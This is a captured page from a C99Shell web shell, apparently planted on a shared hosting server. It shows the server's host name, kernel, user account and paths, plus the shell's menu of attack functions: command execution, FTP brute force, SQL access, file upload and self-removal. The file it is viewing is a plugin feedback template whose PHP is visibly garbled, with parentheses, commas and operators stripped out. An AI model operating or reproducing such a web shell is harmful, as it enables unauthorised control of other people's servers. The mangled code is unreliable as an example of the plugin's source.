!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/documentor/templates/single/   drwxr-xr-x
Free 293.61 GB of 429.69 GB (68.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     feedback.php (2.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Single docs feedback template
 *
 * This template can be overridden by copying it to yourtheme/documentor/single/feedback.php.
 *
 * @author  softaculous
 * @package documentor/Templates
 * @version 1.0.0
 */

if ( ! defined'ABSPATH' ) ) {
    exit;
}

if ( ! 
documentor()->get_option'show_feedback_buttons''documentor_single'true ) ) {
    return;
}

// phpcs:disable
$show_counts documentor()->get_option'show_feedback_buttons_likes''documentor_single'true );

?>

<div class="documentor-single-feedback">
    <?php
    $positive       
0;
    
$negative       0;
    
$positive_title '';
    
$negative_title '';

    if ( 
$show_counts ) {
        
$positive = (int) get_post_metaget_the_ID(), 'positive'true );
        
$negative = (int) get_post_metaget_the_ID(), 'negative'true );

        
// translators: %s - likes number.
        
$positive_title $positive sprintf_n'%d person found this useful''%d persons found this useful'$positive'documentor' ), number_format_i18n$positive ) ) : __'No votes yet''documentor' );

        
// translators: %s - dislikes number.
        
$negative_title $negative sprintf_n'%d person found this not useful''%d persons found this not useful'$negative'documentor' ), number_format_i18n$negative ) ) : __'No votes yet''documentor' );
    }
    
// phpcs:enable
    
?>

    <div>
        <?php echo esc_html__'Was this page helpful?''documentor' ); ?>
    </div>

    <div class="documentor-single-feedback-vote">
        <a href="#" class="documentor-btn" data-id="<?php the_ID(); ?>" data-type="positive" title="<?php echo esc_attr$positive_title ); ?>">
            <?php echo esc_html__'Yes''documentor' ); ?>

            <?php if ( $positive ) { ?>
                <span class="badge"><?php echo esc_htmlnumber_format_i18n$positive ) ); ?></span>
            <?php ?>
        </a>
        <a href="#" class="documentor-btn" data-id="<?php the_ID(); ?>" data-type="negative" title="<?php echo esc_attr$negative_title ); ?>">
            <?php echo esc_html__'No''documentor' ); ?>

            <?php if ( $negative ) { ?>
                <span class="badge"><?php echo esc_htmlnumber_format_i18n$negative ) ); ?></span>
            <?php ?>
        </a>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0914 ]--